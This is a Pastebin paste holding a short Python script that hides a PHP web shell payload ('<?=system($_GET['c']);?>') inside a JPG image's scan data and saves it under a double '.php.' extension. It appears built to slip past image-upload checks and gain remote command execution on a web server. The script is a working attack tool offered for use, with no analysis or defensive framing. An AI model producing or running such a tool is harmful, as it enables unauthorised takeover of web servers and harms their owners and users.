Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # a simple script to inject PHP code into JPG file
- # thanks to Damien Cauquil for insetPayload()
- # ref: https://virtualabs.fr/Nasty-bulletproof-Jpegs-l.html
- from sys import argv
- import struct
- def insertPayload(_in, _out, payload,off):
- img = _in
- # look for 'FF DA' (SOS)
- sos = img.index("\xFF\xDA")
- sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
- sod = sos_size+2
- # look for 'FF D9' (EOI)
- eoi = img[sod:].index("\xFF\xD9")
- # enough size ?
- if (eoi - sod - off)>=len(payload):
- _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
- return True
- else:
- return False
- filein = argv[1]
- fileout = argv[1].replace(".",".php.")
- payload = '<?=system($_GET[\'c\']);?>'
- with open(filein, "rb") as rd:
- data = rd.read()
- with open(fileout, "wb") as wr:
- insertPayload(data,wr,payload,4)
RAW Paste Data
